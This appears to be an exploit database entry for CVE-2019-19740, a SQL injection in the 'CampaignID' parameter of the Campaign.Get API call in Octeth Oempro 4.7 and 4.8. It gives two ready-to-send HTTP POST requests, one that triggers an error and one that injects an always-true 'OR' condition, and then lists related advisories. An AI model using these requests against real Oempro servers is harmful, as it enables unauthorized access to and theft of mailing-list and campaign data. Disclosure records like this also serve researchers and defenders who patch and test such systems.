Lucene search
Bruno de Barros Bulle1337DAY-ID-33864HistoryJan 28, 2020 - 12:00 a.m.
Octeth Oempro 4.8 - (CampaignID) SQL Injection Vulnerability
2020-01-2800:00:00
Bruno de Barros Bulle
0day.today
95
EPSS
0.101
Percentile
95.0%
Exploit for php platform in category web applications
# Exploit Title: Octeth Oempro 4.8 - 'CampaignID' SQL Injection
# Exploit Author: Bruno de Barros Bulle (www.xlabs.com.br)
# Vendor Homepage: www2.octeth.com
# Version: Octeth Oempro v.4.7 and v.4.8
# Tested on: Oempro v.4.7
# CVE : CVE-2019-19740
An authenticated user can easily exploit this vulnerability. Octeth Oempro
4.7 and 4.8 allow SQL injection. The parameter CampaignID in Campaign.Get
is vulnerable.
# Error condition
POST /api.php HTTP/1.1
Host: 127.0.0.1
command=Campaign.Get&CampaignID=2019'&responseformat=JSON
# SQL Injection exploitation
POST /api.php HTTP/1.1
Host: 127.0.0.1
command=Campaign.Get&CampaignID=2019 OR '1=1&responseformat=JSON
# 0day.today [2020-02-02] #Related
cve
cve
CVE-2019-19740
2019-12-12 03:15:11
exploitpack
exploitpack
Octeth Oempro 4.8 - CampaignID SQL Injection
2020-01-28 00:00:00
checkpoint_advisories
checkpoint_advisories
Octeth Oempro SQL injection (CVE-2019-19740)
2020-11-16 00:00:00
nvd
nvd
CVE-2019-19740
2019-12-12 03:15:11
prion
prion
Sql injection
2019-12-12 03:15:00
cvelist
cvelist
CVE-2019-19740
2019-12-12 02:13:21
packetstorm
packetstorm
Octeth Oempro 4.8 SQL Injection
2020-01-28 00:00:00
exploitdb
exploitdb
Octeth Oempro 4.8 - 'CampaignID' SQL Injection
2020-01-28 00:00:00